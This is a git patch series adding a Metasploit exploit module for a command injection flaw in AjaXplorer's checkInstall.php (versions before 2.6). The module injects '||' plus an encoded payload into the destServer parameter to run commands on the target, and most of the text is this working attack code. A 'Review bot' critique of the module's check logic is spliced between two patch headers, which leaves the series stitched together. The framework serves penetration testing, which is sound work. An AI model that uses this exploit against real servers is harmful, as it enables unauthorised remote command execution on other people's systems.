From 5b2998a12171ad3a4584d71575b9a255ef916912 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Sat, 13 Oct 2012 00:35:48 -0500
Subject: [PATCH 1/3] Add OSVDB-63552 AjaXplorer module (2010)
---
 .../http/ajaxplorer_checkinstall_exec.rb | 106 ++++++++++++++++++
 1 file changed, 106 insertions(+)
 create mode 100644 modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
new file mode 100644
index 0000000000..89ebe3b137
--- /dev/null
+++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
@@ -0,0 +1,106 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'AjaXplorer checkInstall.php Remote Command Execution',
+ 'Description' => %q{
+ This module exploits an arbitrary command execution vulnerability in the
+ AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
+ 2.6 are vulnerable.
+ },
+ 'Author' => [ 'David Maciejak' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'OSVDB', '63552' ],
+ [ 'BID', '39334' ]
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 512,
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic perl ruby python bash telnet'
+ }
+ },
+ 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'windows'],
+ 'Arch' => ARCH_CMD,
+ 'Targets' => [[ 'AjaXplorer 2.5.5 or older', { }]],
+ 'DisclosureDate' => 'Apr 4 2010',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])
+ ], self.class)
+ end
+
+ def check
+ target_uri.path << '/' if target_uri.path[-1,1] != '/'
+ clue = Rex::Text::rand_text_alpha(rand(5) + 5)
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
+ 'vars_get' => {
+ 'destServer' => "||echo #{clue}"
+ }
+ })
+
+ # If the server doesn't return the default redirection, probably something is wrong
+ if res and res.code == 200 and res.body =~ /#{clue}/
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ peer = "#{rhost}:#{rport}"
+ 
target_uri.path << '/' if target_uri.path[-1,1] != '/'
+
+ # Trigger the command execution bug
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
+ 'vars_get' =>
+ {
+ 'destServer' => "||#{payload.encoded}"
+ }
+ })
+
+ if res
+ print_status("#{peer} - The server returned: #{res.code} #{res.message}")
+ m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || ''
+
+ if m.empty?
+ print_error("#{peer} - This server may not be vulnerable")
+ else
+ print_status("#{peer} - Command output from the server:")
+ print_line(m[1])
+ end
+ end
+ end
+
+end
+
+=begin
+Repo:
+http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/
+=end
\ No newline at end of file
From cc303665e81d757736abc03c3c32477b26d29708 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Sat, 13 Oct 2012 00:42:44 -0500
Subject: [PATCH 2/3] Credit
---
 .../exploits/multi/http/ajaxplorer_checkinstall_exec.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
index 89ebe3b137..a0c0185f45 100644
--- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
+++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
@@ -20,7 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote
 AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
 2.6 are vulnerable.
 },
- 'Author' => [ 'David Maciejak' ],
+ 'Author' =>
+ [
+ 'Julien Cayssol', #Credited according to SecurityFocus
+ 'David Maciejak', #Metasploit module
+ 'sinn3r' #Final touch on the Metasploit module
+ ],
 'License' => MSF_LICENSE,
 'References' =>
 [
From cedcace1a7c82c473b1a97ae469a8400345199fb Mon Sep 17 00:00:00 2001
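Review bot: `check` returns `Exploit::CheckCode::Safe` whenever the echoed marker is not found, which also covers a nil `res` (no answer at all) and non-200 replies, so an unreachable or differently laid-out host is reported as Safe rather than undetermined; add `return Exploit::CheckCode::Unknown unless res` before the existing test and keep `Safe` only for a 200 whose body lacks the marker. The comment above that test (`# If the server doesn't return the default redirection, probably something is wrong`) describes a redirect check, but the code matches the random marker in a 200 body; reword it to `# A 200 whose body contains the random marker means the injected echo ran`. Both `check` and `exploit` append `/` to `target_uri.path` in place with `<<`, mutating the parsed URI on every call and duplicating the path-building string; `normalize_uri(target_uri.path, 'plugins', 'access.ssh', 'checkInstall.php')` gives the same URI without the side effect. In `exploit` a nil `res` is silently ignored; a `print_error("#{peer} - No response from the server")` branch would make that failure visible.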
From: sinn3r
Date: Sun, 14 Oct 2012 11:43:33 -0500
Subject: [PATCH 3/3] Forgot to change the output variable Because the original script used match()
---
 modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
index a0c0185f45..eadc667fa9 100644
--- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
+++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 print_error("#{peer} - This server may not be vulnerable")
 else
 print_status("#{peer} - Command output from the server:")
- print_line(m[1])
+ print_line(m)
 end
 end
 end